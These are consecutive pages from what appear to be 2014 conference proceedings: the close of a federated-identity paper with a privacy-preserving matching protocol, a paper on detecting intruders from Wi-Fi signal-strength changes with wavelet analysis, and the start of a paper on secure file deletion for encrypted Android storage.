1) Structural-level verification
   a) With naming conflicts: verifies whether or not similar values, from different user attribute sets, have the same attribute identification.
      i) Reference-ontology-based strategy: ontological relations must be established/verified to solve naming conflicts and help find attribute value correspondences.
   b) Without naming conflicts: when there are correspondences in attribute identification names.
2) Verification of matches
   a) Direct matches: a search is performed in the attribute sets that looks for matches in attribute values, i.e.: Set1.Attr1.Value = Set2.Attr1.Value?
   b) Ontological-relation matches: once the UsIdS finds ontological relations (step 1(a)i), it performs a search through those association sets looking for correspondences in attribute values, i.e.: Set1.OR1.Value = Set2.OR2.Value?
   c) Through trusted IdP network establishment: it is necessary to obtain the user's IdPs in order to create such a network. Then, the process restarts from step 1.
Once the UsIdS has performed its searches, if correspondences were found, an indicator of trust in the user identity is provided to the SP (Fig. 1, step 6).
As previously described, these matches can be obtained through direct attribute matching or from ontological resources. These ontological resources use a reference-ontology-based strategy due to its reduced mapping requirements.
As a starting point, the ontologies are used to solve schema-level conflicts. According to [14], this kind of conflict involves differences at the structural level of the domain models that need to be mapped. The conflicts can be divided into the following categories: naming conflicts, entity-identifier conflicts, schema-isomorphism conflicts, generalization conflicts, and aggregation conflicts. We keep our focus on naming conflicts. This type of conflict arises when similar concepts are labelled in a different way, or when different concepts are labelled in a similar way.
All established ontological relations are stored in the C-PEPS to improve matching performance in subsequent searches involving the same users and IdPs, although no private data is kept.
When no matches can be found, the UsIdS tries to establish a trusted IdP network path. The purpose of this network is to find data associations with a third or fourth IdP that can be used to establish a relation among the other IdPs. However, finding the necessary IdPs may be a problem. One possible solution is to search the previously stored ontological relations. It is also possible to ask the user to indicate where the UsIdS may find more attributes that can lead to matches.
C. Privacy
In order to preserve users' privacy, we define a protocol under the model where partners are "honest but curious", or "semi-honest" [15]. This protocol will be used in communications between the IdPs and the UsIdS to prevent the disclosure of user information in the process of trying to find matches; the entities involved should not gain more information than that authorized by the user. For instance, if creating a link between two sets of attributes requires another attribute that both IdPs know, this linking attribute should only be revealed to each attribute source if the attributes match (i.e., the link is possible); otherwise, the attribute source would become aware of user private information for which it was not authorized.
The protocol is defined as follows.
Let p and q be two large prime numbers such that q divides p − 1, let Gq be the unique subgroup of Z*p of order q, and let g and h be generators of Gq.
Let x, y, and c be random numbers in Zq.
Let id be the identifier/attribute that both IdPs know but do not want to share.
The identifiers id1 and idn are private within the attributes. The protocol must prove that these two identifiers were generated from the same id, but it should not be possible to learn the exact id value.
Assuming that both IdP1 and IdPn follow the protocol:
Fig. 2. Proposed privacy preserving protocol
The UsIdS sends a challenge c, and the generators g and h, to
both IdP1 and IdPn. They reply with a Security Assertion Markup
Language (SAML) [16] assertion containing an identifier,
id1 = g^id · h^x and idn = g^id · h^y, respectively, but these
identifiers are not equal (id1 ≠ idn). They also include in the
response r1 = h^(cx) and rn = h^(cy). Finally, the UsIdS must
verify that the following equation holds:

( id1 / idn )^c = r1 / rn

Following this privacy protocol, it is possible to verify
whether the attribute values correspond without disclosing them.
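To make the check concrete, the exchange can be traced with toy parameters. The numbers below are ours and purely illustrative (a real deployment uses large primes and randomly drawn exponents); the variable names are not part of the protocol specification.

```python
# Toy trace of the equality proof; parameters are tiny and INSECURE,
# chosen only so the arithmetic can be followed by hand.
p, q = 23, 11                # q divides p - 1
g, h = 4, 9                  # generators of the order-q subgroup of Z_p*

id_val = 7                   # identifier both IdPs hold but will not reveal
x, y, c = 3, 8, 5            # blinding exponents and the UsIdS challenge, in Z_q

# Each IdP embeds a blinded identifier in its SAML assertion
id1 = pow(g, id_val, p) * pow(h, x, p) % p     # IdP1: g^id * h^x
idn = pow(g, id_val, p) * pow(h, y, p) % p     # IdPn: g^id * h^y
r1, rn = pow(h, c * x, p), pow(h, c * y, p)    # responses to the challenge c

# UsIdS verification: (id1 / idn)^c == r1 / rn, with division done by
# modular inversion; the check passes iff both values hide the same id
lhs = pow(id1 * pow(idn, -1, p) % p, c, p)
rhs = r1 * pow(rn, -1, p) % p
print(lhs == rhs)  # True
```

The check works because id1/idn collapses to h^(x−y), so raising it to c reproduces r1/rn exactly when the g^id terms cancel, i.e., when both identifiers were derived from the same id.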
V. REMAINING PROBLEMS AND FUTURE RESEARCH
There is still room for further research on how to apply
ontologies in the UsIdS, i.e., an evaluation of how accurate
the ontology mappings are. A formal definition of collusion
resistance must be specified (UsIdS x IdPs, and SPs x IdPs).
Some accuracy validations need to be performed on aggregations
in order to verify how efficient the UsIdS is. Once there
are prototypes, it will be possible to evaluate and validate the
proposed ideas.
VI. CONCLUSIONS
We have proposed a solution to increase the strength of
user identifiers by combining facets (i.e., sets of attributes)
from several IdPs. The strength of the identifiers results both
from an increase in the assurance level of attributes repeated
in both sets and an increase of the number of attributes that
comprise the combined facet.
Ontologies solve the problem of “Naming Conflicts” that
occur when combining sets of attributes. Our chosen Reference
Ontology fits our application context (STORK Project), in
which several languages are used and the user data
definitions on IdPs also have different designations.
Our decision to store ontological relations is due to the
fact that the process of establishing these relations could be
computationally heavy. Storing the results can therefore improve
future searches and can be used to discover IdPs to use in
IdP networks.
The communication process between the UsIdS and IdPs uses
a privacy protocol in order to ensure that user attribute values
are not disclosed while the IdP network is being established.
Furthermore, no user attribute values are stored in the
UsIdS; it just acts as a User Identity Aggregator by relaying
IdP attributes and establishing relations among IdPs and
users.
ACKNOWLEDGMENT
This work was partially supported by CAPES Proc. Num.
BEX 9096/13-2 and EU project Stork 2.0 CIP-ICT-PSP-2011-5-297263.

REFERENCES
[1] S. Carmody, M. Erdos, K. Hazelton, W. Hoehn, B. Morgan, T. Scavo, and D. Wasley, “InCommon technical requirements and information,” 2005.
[2] The White House, “National strategy for trusted identities in cyberspace: Enhancing online choice, efficiency, security, and privacy,” February 2009, URL: http://www.whitehouse.gov/sites/default/files/rss_viewer/NSTICstrategy_041511.pdf [accessed: 2014-09-02].
[3] M. Ates, J. Fayolle, C. Gravier, and J. Lardon, “Complex federation architectures: Stakes, tricks & issues,” in Proceedings of the 5th International Conference on Soft Computing As Transdisciplinary Science and Technology, ser. CSTST ’08. New York, NY, USA: ACM, 2008, pp. 152–157, ISBN: 978-1-60558-046-3, URL: http://doi.acm.org/10.1145/1456223.1456258 [accessed: 2014-09-02].
[4] E. Bertino, F. Paci, and N. Shang, “Keynote 2: Digital identity protection - concepts and issues,” in Availability, Reliability and Security, 2009. ARES ’09. International Conference on, March 2009, pp. lxix–lxxviii, ISBN: 978-1-4244-3572-2, URL: http://dx.doi.org/10.1109/ARES.2009.176 [accessed: 2014-09-02].
[5] “Identity assurance framework: Assurance levels,” 2010.
[6] D. Chadwick and G. Inman, “Attribute aggregation in federated identity management,” Computer, vol. 42, no. 5, pp. 33–40, May 2009, ISSN: 0018-9162, URL: http://dx.doi.org/10.1109/MC.2009.143 [accessed: 2014-09-02].
[7] D. W. Chadwick, G. Inman, and N. Klingenstein, “A conceptual model for attribute aggregation,” Future Gener. Comput. Syst., vol. 26, no. 7, pp. 1043–1052, Jul. 2010, ISSN: 0167-739X, URL: http://dx.doi.org/10.1016/j.future.2009.12.004 [accessed: 2014-09-02].
[8] J. Vossaert, J. Lapon, B. Decker, and V. Naessens, “User-centric identity management using trusted modules,” in Public Key Infrastructures, Services and Applications, ser. Lecture Notes in Computer Science, J. Camenisch and C. Lambrinoudakis, Eds. Springer Berlin Heidelberg, 2011, vol. 6711, pp. 155–170, ISBN: 978-3-642-22632-8, URL: http://dx.doi.org/10.1007/978-3-642-22633-5_11 [accessed: 2014-09-02].
[9] M. Barisch, E. Garcia, M. Lischka, R. Marques, R. Marx, A. Matos, A. Mendez, and D. Scheuermann, “Security and privacy enablers for future identity management systems,” in Future Network and Mobile Summit, 2010, June 2010, pp. 1–10, ISBN: 978-1-905824-18-2.
[10] F. Paci, R. Ferrini, A. Musci, K. Steuer, and E. Bertino, “An interoperable approach to multifactor identity verification,” Computer, vol. 42, no. 5, pp. 50–57, May 2009, ISSN: 0018-9162, URL: http://dx.doi.org/10.1109/MC.2009.142 [accessed: 2014-09-02].
[11] N. Shang, F. Paci, and E. Bertino, “Efficient and privacy-preserving enforcement of attribute-based access control,” in Proceedings of the 9th Symposium on Identity and Trust on the Internet, ser. IDTRUST ’10. New York, NY, USA: ACM, 2010, pp. 63–68, ISBN: 978-1-60558-895-7, URL: http://doi.acm.org/10.1145/1750389.1750398 [accessed: 2014-09-02].
[12] V. Kashyap and A. P. Sheth, Information Brokering Across Heterogeneous Digital Data: A Metadata-based Approach (Advances in Database Systems). Springer, 2000, ISBN: 0792378830.
[13] T. R. Gruber, “A translation approach to portable ontology specifications,” Knowl. Acquis., vol. 5, no. 2, pp. 199–220, Jun. 1993, ISSN: 1042-8143, URL: http://dx.doi.org/10.1006/knac.1993.1008 [accessed: 2014-09-02].
[14] A. Mocan, F. M. Facca, N. Loutas, V. Peristeras, S. K. Goudos, and K. A. Tarabanis, “Solving semantic interoperability conflicts in cross-border e-government services,” International Journal on Semantic Web & Information Systems, vol. 5, no. 1, pp. 1–47, 2009, DOI: 10.4018/jswis.2009010101, URL: http://dx.doi.org/10.4018/jswis.2009010101 [accessed: 2014-09-02].
[15] Y. Lindell and B. Pinkas, “Secure multiparty computation for privacy-preserving data mining,” Journal of Privacy and Confidentiality, vol. 1, no. 1, pp. 59–98, 2009, URL: http://repository.cmu.edu/cgi/viewcontent.cgi?article=1004&context=jpc [accessed: 2014-09-02].
[16] “SAML specifications,” 2013, URL: http://saml.xml.org/saml-specifications/ [accessed: 2014-09-08].

Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Wi-Fi Intruder Detection
An experimental approach
Rui Fernandes1, João N. Matos1, Tiago Varum1
1 Instituto de Telecomunicações Aveiro
Aveiro, Portugal
ruifelix@ua.pt, matos@ua.pt, tiago.varum@ua.pt
Abstract - In a society where monitoring and security are
among the most important concerns, this system represents a
convenient and interesting low-cost solution for intruder
detection. Using widespread infrastructure such as Wi-Fi
routers and laptops, we propose an innovative alternative
capable of detecting intruders by sensing the electromagnetic
interference they cause. These perturbations are sensed by the
system through changes in the acquired Wi-Fi Received Signal
Strength Indicator (RSSI) in the presence of obstacles/targets
between the transmitter and receiver.
Keywords-Wi-Fi; RF Signature; Wavelet Transform;
Intruder Detection; RSSI; Security; Wireless.
I. INTRODUCTION
A wide number of solutions for intruder detection are
available nowadays. From the simple and low-cost infrared
and Passive Infrared (PIR) sensors [1][2], which detect the heat
radiated from the human body, up to high-end RADAR
security systems [3], a large variety of effective solutions
are available to fulfil the various needs of different
scenarios.
All the mentioned solutions share the requirement of
introducing or installing extra components in the environment
under surveillance. The goal of this work is to propose an
innovative and pertinent alternative suitable for modern
scenarios.
With practicality in mind, our system reuses the widely
deployed Wi-Fi infrastructure, leveraging its easy
implementation, which makes it suitable for both domestic and
industrial environments. Using only a standard Wi-Fi
router connected wirelessly to a laptop with dedicated
software, this security system can be a simple solution to
the intruder detection problem. This work mainly aims
to demonstrate the concept of Wi-Fi intruder detection with
results in a controlled scenario. Nevertheless, some
considerations and challenges in adapting this prototype to a
real scenario are addressed.
This paper is divided into six sections. The first two
sections provide an overview of the developed work and
state-of-the-art applications. The third section unveils the
system's operation modules and provides a brief explanation
of the concepts of the Wavelet Transform and the RSSI in the
scope of the designed prototype. The fourth and fifth sections
address the experimental setup and the results obtained, with
additional considerations regarding the setup used and its
consequent
Pedro Pinho1,2
2
Inst. Sup. Eng. Lisboa – ISEL
Lisboa, Portugal
ppinho@deetc.isel.pt
analysis. Finally, the last section draws some conclusions
and indicates the future work proposed by the group.
II. RELATED WORK
In the last decades, with the proliferation of mobile
phones and Wi-Fi Access Points (APs), a set of
groundbreaking applications was developed to demonstrate the
large capacity of wireless networks.
An example of this trend is the concept of Wi-Fi
localization [3][4][5]. This concept exploits RSSI data from
different APs to assemble innovative and accurate
localization systems, providing an attractive alternative and
complement to the Global Positioning System (GPS). In
parallel with the development of these applications, studies
were conducted focusing on the characteristics and practical
concerns of the Received Signal Strength Indicator (RSSI)
[3][4].
Recently, in the monitoring scope, WiSee [7] and WiVi
[6] displayed the large tracking detail that can be obtained
from Wi-Fi signals when proper signal processing tools are
applied.
WiSee showed the capacity of Wi-Fi based systems
to recognize human gestures by extracting the signals'
Doppler frequency shifts [7]. WiVi, using Multiple Input
Multiple Output (MIMO) interference nulling [6], detects
human movement through walls by eliminating the
reflections of static objects.
Closer to the context of this work, a detection system
based on the RSSI was presented with the goal of
monitoring pedestrian and automobile traffic [8]. The
differentiation of the targets was obtained through the
different RSSI changes triggered by cars and humans.
To achieve this objective, a moving mean and
variance technique was adopted to analyze the data.
We propose a less complex system, inspired by the
previously mentioned works, that senses through the RSSI
the alterations caused by intruders in a static environment. To
refine the detection and to help avoid false alarms, the
Wavelet Transform is applied to the RSSI data. This signal
processing technique is characterized by time and
frequency multiresolution and is utilized in diverse image
and video processing procedures [9][10][11][12][13].
III. SYSTEM
This section is dedicated to the system characterization.
As mentioned before, the RSSI and the Wavelet Transform
are at the core of the operating principle, so due to their
importance an introduction to these concepts is presented in
the following subsections.
A. RSSI
The RSSI is a Radio Frequency (RF) measure that
indicates, in dBm, a reference value of the received signal
power at the receiver antenna.
Although the RSSI is a real-time indicator of the
received signal strength and of the quality of the connection,
it has been shown that the RSSI used on its own needs to
go through a calibration process to overcome the
environmental factors that influence the signal quality
[4][14][15].
In this paper, the RSSI is used as a measure that
indicates the effects of the presence of intruders or other
targets on the received signal.
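As a brief aside, the dBm values used throughout can be converted to absolute power with the standard relations; the small helper below is illustrative and not part of the system described in the paper:

```python
import math

def dbm_to_mw(p_dbm):
    """P[mW] = 10 ** (P[dBm] / 10); 0 dBm is 1 mW by definition."""
    return 10 ** (p_dbm / 10)

def mw_to_dbm(p_mw):
    """P[dBm] = 10 * log10(P[mW])."""
    return 10 * math.log10(p_mw)

# The roughly 10 dB attenuation later reported for a human (Section V)
# means the received power drops by a factor of about 10:
print(dbm_to_mw(-40) / dbm_to_mw(-50))  # ~10
```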
B. Wavelet Transform
The Wavelet Transform is a multiresolution signal
processing method capable of adjusting the window length
to get a desirable precision in different signal regions,
allowing long time windows where low-frequency
information is needed and short windows for high-frequency
information.
According to Misiti et al. [10], “A wavelet is a
waveform of effectively limited duration that has an
average value of zero.” However, in contrast with the
sinusoids that form the basis of Fourier analysis, wavelets
tend to have irregularities and an “unpredictable” shape.
The Wavelet Transform uses shifted and scaled versions
of the mother wavelet to decompose the signal under analysis.
So, the choice of an adequate wavelet is an important step
in the analysis process.
In mathematical terms, the Wavelet Transform is
represented by:

C(a, p) = ∫_{−∞}^{+∞} f(t) ψ(a, p, t) dt        (1)

where a represents the scale factor and p the shift
position. The Continuous Wavelet Transform (CWT) is a
sum over time of the multiplication of the signal by a
scaled and shifted version of the mother wavelet. Each
coefficient evaluates the similarity between the original
signal and the wavelet: the higher the value of the
coefficient, the more similar the signal and the wavelet are.
In the proposed system, the interference generated by
intruders is analyzed by applying the Wavelet Transform to
the RSSI data stream. The core of the analysis process
lies in the correct choice of wavelet and scale function;
great care is needed to find the best match between the
wavelet and the pattern to be detected.
The wavelet chosen was the Haar wavelet (a step
function) with a scale factor of 30. This decision was made
taking into consideration the similarity of the step function
to the human interference pattern and the better results
obtained compared with the several other wavelets tested,
presented in Figure 1.
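The idea can be illustrated with a small numerical sketch. The following Haar correlation is an assumed re-implementation (the authors use a MATLAB platform, per the processing module subsection), and the synthetic RSSI trace stands in for real data; coefficients stay near zero on flat regions and spike at step-like drops such as the attenuation caused by an intruder.

```python
import numpy as np

def haar_cwt(signal, scale):
    """Correlate a signal with a scaled Haar wavelet (step function).
    Coefficients sit near zero on flat regions and peak at step-like
    transitions, e.g., the RSSI drop caused by an intruder."""
    half = scale // 2
    # Haar wavelet at this scale: +1 over the first half, -1 over the second
    wavelet = np.concatenate([np.ones(half), -np.ones(scale - half)])
    wavelet /= np.sqrt(scale)  # energy normalization
    # Edge-pad so constant boundary regions produce zero coefficients
    padded = np.pad(np.asarray(signal, dtype=float), scale, mode="edge")
    coeffs = np.convolve(padded, wavelet[::-1], mode="same")
    return coeffs[scale:-scale]

# Synthetic RSSI trace: -40 dBm baseline with a 10 dB drop (intruder present)
rssi = np.full(200, -40.0)
rssi[80:120] -= 10.0
coeffs = haar_cwt(rssi, scale=30)
# |coeffs| is ~0 on the baseline and peaks near the edges of the drop
```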
Fig. 1. Example of wavelet families: (a) Haar, (b) Daubechies 4, (c) Coiflet 1, (d) Symlet 2, (e) Meyer, (f) Morlet, (g) Mexican Hat [8]
C. System Architecture
The system architecture is divided into three
interconnected modules: the radio, data, and processing modules.
a) Radio module
The radio module is responsible for emitting and
receiving the data using the Wi-Fi protocol. It consists of
a router on the transmitter side and, on the receiver side,
a laptop with a receiver antenna connected to a network card.
The designed prototype utilizes a Samsung laptop,
model NP350V5C, an Asus wireless LAN router, model
WL-500n, and an external network card from the
manufacturer TP-LINK, model TL-WN722N (see Figure 4).
This hardware module is responsible for both generating
and receiving electromagnetic signals in the 2.4 GHz
operation band.
Our system is influenced by the inherent characteristics
of wireless communication protocols, the most relevant
being multipath fading, packet collisions, and natural
interference from other APs.
b) Data Module
The data module is both software and hardware based
and has the role of communication bridge between the radio
and processing modules. Connected to the PHY layer through
the network card, the data module selects the packets by
applying network filters, discarding packets from undesirable
network addresses. When this filtering process is completed,
the stream of RSSI data is sent to the processing module
(Figure 2).
The software used was Microsoft Network Monitor 3.4,
responsible for gathering all the RSSI values and
selecting the correct network address.
Fig. 2. Simplification of the Data Module operation principle

IV. EXPERIMENTAL SET UP
The experiments were carried out in a domestic indoor
scenario. The line of sight between the transmitter and
receiver was intentionally kept clear within a radius of
approximately 3 meters. The directional antennas used were
set at a height of 1 meter, 1.8 meters from the ceiling
(Figure 4). The receiver and transmitter were separated by
3 meters, with the targets inserted at half distance, i.e.,
1.5 meters (Figure 4).
The half-distance placement was adopted after testing
several setups with the targets closer to the Tx or to the Rx.
These asymmetrical arrangements showed that the results
are dominated by the smaller of the distances between the
target and the Tx or Rx. Also, when the targets are inserted
close to the transmitter or receiver end of the system, the
signals are highly attenuated. The minimum acceptable
distance between the target and the Tx or Rx obtained for
our system was 20 cm. At distances below that threshold, the
received signal is very weak and exhibits large power
fluctuations.
The system was also evaluated for further Tx–Rx
distances in the 0.2 to 10 meters interval. From this
study it was concluded that, in these controlled-environment
experiments, the distance does not affect the performance
much up to the 6-meter mark, producing only a decrease of
the mean value of the received signals on the order of 1 to
6 dB. Beyond this distance, the presence of a human is more
difficult to identify.
Fig. 3. Simplification of the Processing Module operation principle
c) Processing Module
The processing module is completely software based
and is implemented on a MATLAB platform (Figure 3).
This module has the important task of filtering the noise
from the received signals and applying signal processing
methods to detect and distinguish the different targets.
The filtering process is simply used to eliminate noise
due to the multipath and collision components inherent in
Wi-Fi connections. This noise appears in the received signals
in the form of notches of one sample duration, with 20 to 30
dB of attenuation in comparison with the trend of the
signal. To filter these undesirable samples, a simple scheme
that detects and discards such packets was adopted, always
keeping in mind the concern of maintaining the original
signal response. Then, the Wavelet coefficients are
computed and the human presence is analyzed. The
application of the Wavelet Transform also guarantees an
additional filtering process, because it makes the system
insensitive to the variations of quality of the received signal
in a wireless channel, with the coefficient values
oscillating around zero. This last feature can be very
interesting, for example, to create/design an automatic target
identification method based on thresholds of the coefficient
values generated by different targets, which is very difficult
to implement directly from the RSSI data.
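The notch-discarding step described above can be sketched as follows. The local-median trend estimate and the window size are our assumptions, since the paper does not specify the exact detection rule; only the "discard one-sample notches 20–30 dB below the trend" behavior comes from the text.

```python
import numpy as np

def remove_notches(rssi, window=5, threshold_db=20.0):
    """Discard single-sample notches that fall far below the local trend,
    an artifact of multipath fading and packet collisions. The trend is
    estimated as a running median (assumed detail, not from the paper)."""
    rssi = np.asarray(rssi, dtype=float)
    half = window // 2
    kept = []
    for i, v in enumerate(rssi):
        lo, hi = max(0, i - half), min(len(rssi), i + half + 1)
        trend = np.median(rssi[lo:hi])   # local trend around sample i
        if v >= trend - threshold_db:    # keep samples close to the trend
            kept.append(v)
    return np.array(kept)

# A flat -40 dBm trace with one 30 dB collision notch at sample 25
trace = np.full(50, -40.0)
trace[25] = -70.0
cleaned = remove_notches(trace)
print(len(trace), len(cleaned))  # 50 49
```

Discarding (rather than interpolating) the notch samples mirrors the paper's concern of preserving the original signal response without inventing values.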
Connecting all the modules, the system works in the
following manner: the radio module generates the signals on
the emitter side; the signals propagate in the medium,
affected by the intruder's presence. When received, the
signals are handled on the receiver side of the radio module.
Then, the data module gathers the RSSI data from the PHY
layer and selects the correct network address, subsequently
sending the data to the processing module. Here, the data
is filtered and then the Wavelet Transform is applied. With
the Wavelet coefficients computed, the data is analyzed with
the goal of determining whether an intruder is detected.
Fig. 4. Schematic of the experimental set up.
It is also worth mentioning that the system works in the
presence of nearby obstacles, requiring special attention
only to the Tx–Rx line of sight. From the experiments
carried out by the group, it can be preliminarily
concluded that the presence of objects of a size similar to
the human body blocking the line of sight influences the
system performance, especially metallic objects.
a) Detection Experiments
The system detection performance was tested in two
different scenarios: the presence of one and of two humans.
To avoid false alarms, the response of the system to
the presence of domestic animals, in particular cats and
dogs, was evaluated. The dimensions of the different targets
are presented in Table I.
TABLE I. TARGET DIMENSIONS

              Human 1   Human 2   Dog    Cat
Height (m)    1.70      1.68      0.68   0.3
Width (m)     0.45      0.40      0.45   0.57
Regarding the testing procedure, the experiments
consisted of taking samples of the environment in a silent
scenario for approximately 20 seconds, and then inserting the
targets during an interval of the same length. In the animal
detection experiments, the accuracy of the sampling intervals
dropped due to unpredictable animal reactions.
The angle of detection in the 3-meter experiments was
approximately ±30° in the longitudinal plane.
V. RESULTS AND ANALYSIS
The results are presented in two subsections. The first
evaluates the human detection and the second the
domestic animal response. In both subsections, the first
graphic shows the RSSI data and the second the Wavelet
coefficients plot.
Fig. 6. Two humans walking side by side; Up) RSSI data; Down) Wavelet coefficients
B. Animal detection
The results from the animal detection are presented in
Figures 7 and 8. The interference of a dog proved to be
smaller in comparison with a human's. Both the signal
attenuation and the Wavelet coefficient alterations are
reduced but perceptible in both patterns.
A. Human detection
The human detection results are presented in Figures 5
and 6. In both plots, the moments of intruder presence are
easily distinguished. Specifically, an attenuation of
approximately 10 dB of the received signal is visible in the
RSSI data, along with increased values of the Wavelet
coefficients and a consequent oscillation of the pattern.
Fig. 7. Dog, Up) RSSI data; Down) Wavelet coefficient
Fig. 5. Human walking; Up) RSSI data; Down) Wavelet coefficients
The experiment with two humans walking side by side
showed an interference similar to that of the single-human
experiment, presenting only a wider attenuation interval
(Figure 6).
Fig. 8. Cat, Up) RSSI data; Down) Wavelet coefficient
The cat detection results are shown in Figure 8. Due to
the smaller dimensions of the cat, principally in height, the
signal attenuation is only around 1 to 3 dB, which proves to
be outside the system's detection range.
VI. CONCLUSION AND FUTURE WORK
This work presented an innovative security system
capable of detecting intruders based on the RF interference
generated in a static environment. The proposed Wavelet
Transform based technique exhibited a good detection
capability and enhanced the target identification
performance of the system.
The Wavelet Transform coefficient analysis proved to be
a good complement to the RSSI data, with suitable
characteristics for improving the system to autonomously
identify targets (recalling the processing module
subsection) and possibly avoid false alarms, e.g., by
neglecting a car or dog detection.
The Wavelet Transform improvements are also
noticeable in the detection of moving targets with
significant speed, e.g., a running human, where the
interference triggered can be mistaken for
noise/oscillations in the raw RSSI data. In contrast, the
patterns obtained with the Wavelet coefficients are similar
to those presented in this paper, where the detection
moments are easily seen. Additionally, to enhance the
system detection capacity, the adjustment of the scale factor
of the Wavelet Transform can be used to detect/neglect
smaller RSSI interference patterns. These two last
topics are not addressed in detail in this paper because they
are currently under study, with only preliminary results.
To support the system, an evaluation experiment
exposed the different effects of the presence of domestic
animals on the received signals. The domestic animals proved
to have a reduced influence on the system performance,
except when the emitter and receiver are very close to the
animal (less than 0.75 meters).
The results proved the feasibility and performance of
this interesting low-cost solution, achieving, in a total of 500
experiments, a 95% human detection ratio in a domestic
scenario, comparable to other RSSI-based systems [5][8]. In
[5][8], the authors claim to achieve a 100% human detection
ratio in similar conditions, i.e., line of sight.
Under study are methods to distinguish different targets
more efficiently, the adaptation of the system to perform
real-time detection, the introduction of additional antennas
to improve the system coverage area, and the use of the
dual-frequency mode available in the 802.11 standard. In
terms of propagation, the influence of linearly and circularly
polarized antennas on the system performance is also under
analysis. Regarding the experimental setup, the influence of
the presence of obstacles and intruder detection outside the
line of sight are under study; finally, we intend to test our
system in a real environment to further prove our concept
and identify the improvements needed.
REFERENCES
[1] T. Yokoishi, J. Mitsugi, O. Nakamura, and J. Murai, "Room occupancy determination with particle filtering of networked pyroelectric infrared (PIR) sensor data," Sensors, 2012 IEEE, October, 2012, pp. 1-6.
[2] Y. W. Bai, Z. H. Li, and Z. L. Xie, "Enhancement of the complement of an embedded surveillance system with PIR sensors and ultrasonic sensors," Consumer Electronics (ISCE), 2010 IEEE 14th International Symposium on, June, 2010, pp. 1-6.
[3] P. Bahl and V. N. Padmanabhan, "RADAR: An In-Building RF-based User Location and Tracking System," IEEE INFOCOM, March, 2000, vol. 2, pp. 775-784.
[4] M. Saxena, P. Gupta, and B. N. Jain, "Experimental Analysis of RSSI-based Location Estimation in Wireless Sensor Networks," Communication Systems Software and Middleware and Workshops, January, 2008, pp. 503-510.
[5] Z. Zhang, X. Zhou, W. Zhang, Y. Zhang, and G. Wang, "I Am the Antenna: Accurate Outdoor AP Location using Smartphones," MobiCom '11, August, 2011, pp. 109-120.
[6] F. Adib and D. Katabi, "See through walls with WiFi!," ACM SIGCOMM Computer Communication Review, August, 2013, Volume 43, Issue 4, pp. 75-86.
[7] Q. Pu, S. Gupta, S. Gollakota, and S. Patel, "Whole-home gesture recognition using wireless signals," MobiCom '13, October, 2013, pp. 27-38.
[8] A. Al-Husseiny and M. Youssef, "RF-based Traffic Detection and Identification," Vehicular Technology Conference (VTC Fall), IEEE, September, 2013, pp. 1-5.
[9] A. N. Akansu, W. A. Serdijn, and I. W. Selesnick, "Emerging applications of wavelets: A review," Physical Communication 3, Elsevier, March, 2010, pp. 1-8.
[10] M. Misiti, Y. Misiti, G. Oppenheim, and J.-M. Poggi, Wavelet Toolbox™ 4, User's Guide, The MathWorks, Inc., 2009.
[11] S. Arivazhagan and R. N. Shebiah, "Object Recognition Using Wavelet Based Salient Points," The Open Signal Processing Journal 2, December, 2009, pp. 14-20.
[12] Y. Jin, E. Angelini, and A. Laine, "Wavelets in Medical Image Processing: Denoising, Segmentation, and Registration," International Topics in Biomedical Engineering, Springer US, January, 2005, pp. 305-358.
[13] J. N. Bradley, C. M. Brislawn, and T. Hopper, "FBI wavelet/scalar quantization standard for gray-scale fingerprint image compression," Visual Information Processing II, June, 1993, p. 293.
[14] X. Li, J. Teng, Q. Zhai, J. Zhu, D. Xuan, and Y. F. Zheng, "EV-Human: Human Localization via Visual Estimation of Body Electronic Interference," Proceedings of INFOCOM 2013, April, 2013, pp. 500-504.
[15] A. LaMarca, J. Hightower, I. Smith, and S. Consolvo, "Self-Mapping in 802.11 Location Systems," Intel Research Seattle, Seattle, 2005, pp. 87-104.
Adding Secure Deletion to an Encrypted File System on Android Smartphones
Alexandre Melo Braga, Alfredo H. Gallinucci Colito
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,acolito}@cpqd.com.br
Abstract—Nowadays, mobile devices are powerful enough to
accomplish most of the tasks previously accomplished only by
personal computers; that includes file management. However,
on many devices the file deletion operation misleads the user
into thinking that the file has been permanently removed,
when that is usually not the case. Also, with the increasing use
of encryption, attackers have been directed to weaker targets.
One of them is the recovery of supposedly deleted data from
flash memories. This paper describes a way to integrate secure
deletion technologies into an encrypted file system on Android
smartphones.
Keywords-secure delete; secure storage; encrypted file
system; flash memory; mobile devices; Android.
I. INTRODUCTION
Nowadays, many users keep their sensitive data on
mobile devices. However, mobile devices are vulnerable to
data leakage. As the amount of digital data grows, so does
the theft of sensitive data through loss of device, exploitation
of vulnerabilities or misplaced security controls. Sensitive
data may also be leaked accidentally due to improper
disposal or resale of devices.
With the increasing use of encryption systems, an
attacker wishing to gain access to sensitive data is directed to
weaker targets. One possible attack is the recovery of
supposedly erased data from internal storage, possibly a flash
memory card. To protect the secrecy of data during its entire
lifetime, encrypted file systems must provide not only ways
to securely store, but also reliably delete data, in such a way
that recovering them from physical medium is almost
impossible.
The new generations of mobile devices are powerful
enough to accomplish most of the tasks previously
accomplished only by personal computers. That includes file
management operations (e.g., create, read, update, and
delete). Also, today’s devices possess operating systems that
are hardware-agnostic by design and abstract from ordinary
users all hardware details, such as writing procedures for
flash memory cards.
Additionally, the misuse by intelligence agencies of data
destruction standards, as well as of embedded technologies
that can suffer from backdoors or inaccurate implementations,
in an attempt to facilitate unauthorized access to supposedly
deleted data, is a real threat. In fact, there is a need for
practical security technologies that work at the operating
system level, under the control of the user. Such technology
has to be easy to use in everyday activities and easily
integrated into mobile devices with minimal maintenance
and installation costs.
This paper describes a way to integrate secure deletion
technologies into an encrypted file system on Android
smartphones. This work is part of an effort to build security
security [1][2].
The remaining parts of the text are organized as follows.
Section II offers background information. Section III
discusses related work. Section IV details the proposed
integration of encrypted file systems and secure deletion
functions. Section V presents a performance evaluation for
the secure deletion function. Section VI discusses
improvements on the proposed approach. Section VII
concludes this text.
II. BACKGROUND
Traditionally, the importance of secure deletion is well
understood by almost everyone and several real-world
examples can be given on the subject: sensitive mail is
shredded; published government information is selectively
redacted; access to top secret documents ensures all copies
can be destroyed; and blackboards at meeting rooms are
erased after sensitive appointments.
In mobile devices, that metaphor is not easily
implemented. All modern file systems allow users to
“delete” their files. However, on many devices the remove-file command misleads the user into thinking that her file has
been permanently removed, when that is not the case. File
deletion is usually implemented by unlinking files, which
only changes file system metadata to indicate that the file is
“deleted”; while the file’s full contents remain available in
physical medium. This simple procedure is called logical or
ordinary deletion.
